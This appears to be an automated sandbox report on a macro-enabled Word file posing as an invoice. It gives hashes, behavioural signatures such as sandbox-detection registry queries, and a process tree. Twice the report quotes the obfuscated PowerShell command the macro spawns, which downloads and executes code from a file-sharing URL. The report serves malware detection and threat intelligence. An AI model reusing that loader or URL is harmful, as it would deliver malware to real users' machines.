Analysis
- max time kernel: 239s
- max time network: 243s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 10-06-2022 14:00

Static task: static1
Behavioral task: behavioral1
- Sample: INVOICE PACKAGE LINK TO DOWNLOAD.docm
- Resource: win10v2004-20220414-en
General
- Target: INVOICE PACKAGE LINK TO DOWNLOAD.docm
- Size: 16KB
- MD5: f2d0c66b801244c059f636d08a474079
- SHA1: c62129fff128817b5af62aa0051c082f9992112e
- SHA256: 08d4fd5032b8b24072bdff43932630d4200f68404d7e12ffeeda2364c8158873
- SHA512: 5283b2c228d6bdfe5d942f0a318ecd7e251e8a78d1451dc825f05e35d5e07a362e04c8777f63761b13bc672e76391cdc11be5e86ae4a260715e3e5a5cd2f305d
Malware Config
- Extracted URL: https://filetransfer.io/data-package/UR2whuBv/download
Signatures

Process spawned unexpected child process (2 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 1504 | 2512 | powershell.exe | WINWORD.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 5112 | 2512 | powershell.exe | WINWORD.EXE
Blocklisted process makes network request (2 IoCs)
Processes:
flow | pid | process
35 | 1504 | powershell.exe
81 | 5112 | powershell.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTP)
Checks processor information in registry (2 TTPs, 8 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
Modifies registry class (1 IoC)
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings | firefox.exe
Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes:
pid | process
2512 | WINWORD.EXE (2 entries)
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes:
pid | process
1504 | powershell.exe (2 entries)
5112 | powershell.exe (3 entries)
Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes:
description | pid | process
Token: SeDebugPrivilege | 1504 | powershell.exe
Token: SeDebugPrivilege | 5112 | powershell.exe
Token: SeDebugPrivilege | 4248 | firefox.exe
Token: SeDebugPrivilege | 4248 | firefox.exe
Suspicious use of FindShellTrayWindow (4 IoCs)
Processes:
pid | process
4248 | firefox.exe (4 entries)
Suspicious use of SendNotifyMessage (3 IoCs)
Processes:
pid | process
4248 | firefox.exe (3 entries)
Suspicious use of SetWindowsHookEx (10 IoCs)
Processes:
pid | process
2512 | WINWORD.EXE (9 entries)
4248 | firefox.exe (1 entry)
Suspicious use of WriteProcessMemory (64 IoCs; identical rows collapsed)
Processes:
description | pid | process | target process
PID 2512 wrote to memory of 1504 | 2512 | WINWORD.EXE | powershell.exe
PID 2512 wrote to memory of 5112 | 2512 | WINWORD.EXE | powershell.exe
PID 1532 wrote to memory of 4248 | 1532 | firefox.exe | firefox.exe
PID 4248 wrote to memory of 4776 | 4248 | firefox.exe | firefox.exe
PID 4248 wrote to memory of 4376 | 4248 | firefox.exe | firefox.exe
PID 4248 wrote to memory of 2296 | 4248 | firefox.exe | firefox.exe
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\INVOICE PACKAGE LINK TO DOWNLOAD.docm" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of WINWORD.EXE)
    Command line: powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of WINWORD.EXE)
    Command line: powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
- C:\Program Files\Mozilla Firefox\firefox.exe
  Command line: "C:\Program Files\Mozilla Firefox\firefox.exe"
  - Suspicious use of WriteProcessMemory
  - C:\Program Files\Mozilla Firefox\firefox.exe (child of firefox.exe)
    Command line: "C:\Program Files\Mozilla Firefox\firefox.exe"
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - C:\Program Files\Mozilla Firefox\firefox.exe (content process, gpu)
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4248.0.1282594299\2012578561" -parentBuildID 20200403170909 -prefsHandle 1684 -prefMapHandle 1600 -prefsLen 1 -prefMapSize 219989 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4248 "\\.\pipe\gecko-crash-server-pipe.4248" 1764 gpu
    - C:\Program Files\Mozilla Firefox\firefox.exe (content process, tab)
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4248.3.1318757906\1276019456" -childID 1 -isForBrowser -prefsHandle 2380 -prefMapHandle 1480 -prefsLen 112 -prefMapSize 219989 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4248 "\\.\pipe\gecko-crash-server-pipe.4248" 2328 tab
    - C:\Program Files\Mozilla Firefox\firefox.exe (content process, tab)
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4248.13.2093681315\2130023771" -childID 2 -isForBrowser -prefsHandle 3692 -prefMapHandle 3688 -prefsLen 6894 -prefMapSize 219989 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4248 "\\.\pipe\gecko-crash-server-pipe.4248" 3712 tab
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
  SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
  SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
  SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: abc27673d9c940ad74b41c58391d2412
  SHA1: 9a31a521a521dcd0f974ce6f7a50aecc69a50df0
  SHA256: cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357
  SHA512: c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4